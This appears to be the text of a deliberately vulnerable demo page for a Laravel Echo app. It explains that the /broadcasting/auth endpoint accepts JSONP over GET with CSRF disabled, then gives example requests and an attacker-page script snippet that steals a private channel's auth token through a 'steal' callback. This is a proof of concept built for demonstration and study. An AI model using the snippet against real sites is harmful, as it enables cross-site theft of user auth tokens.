Logged in as Test User ([email protected])
Broadcasts an event on the private-secret-data channel.
Listening on private-secret-data via Laravel Echo.
Waiting for messages...
These values are embedded in the built JavaScript and visible to anyone. Use them to configure the attacker page.
The /broadcasting/auth
endpoint supports JSONP via a callback
query parameter. It also accepts GET requests and has CSRF disabled.
This means an attacker-controlled page can use a <script> tag to steal your channel auth token.
POST /broadcasting/auth
Content-Type: application/x-www-form-urlencoded
channel_name=private-secret-data&socket_id=123456.654321
Response: {"auth":"app_key:hmac_signature"}
GET /broadcasting/auth?callback=steal&channel_name=private-secret-data&socket_id=123456.654321
Response: /**/ typeof steal === 'function' && steal({"auth":"app_key:hmac_signature"});
<script>function steal(data) { console.log('Stolen:', data.auth); }</script>
<script src="https://jsonp-reverb-victim.evilhacker.dev/broadcasting/auth?callback=steal&channel_name=private-secret-data&socket_id=123.456"></script>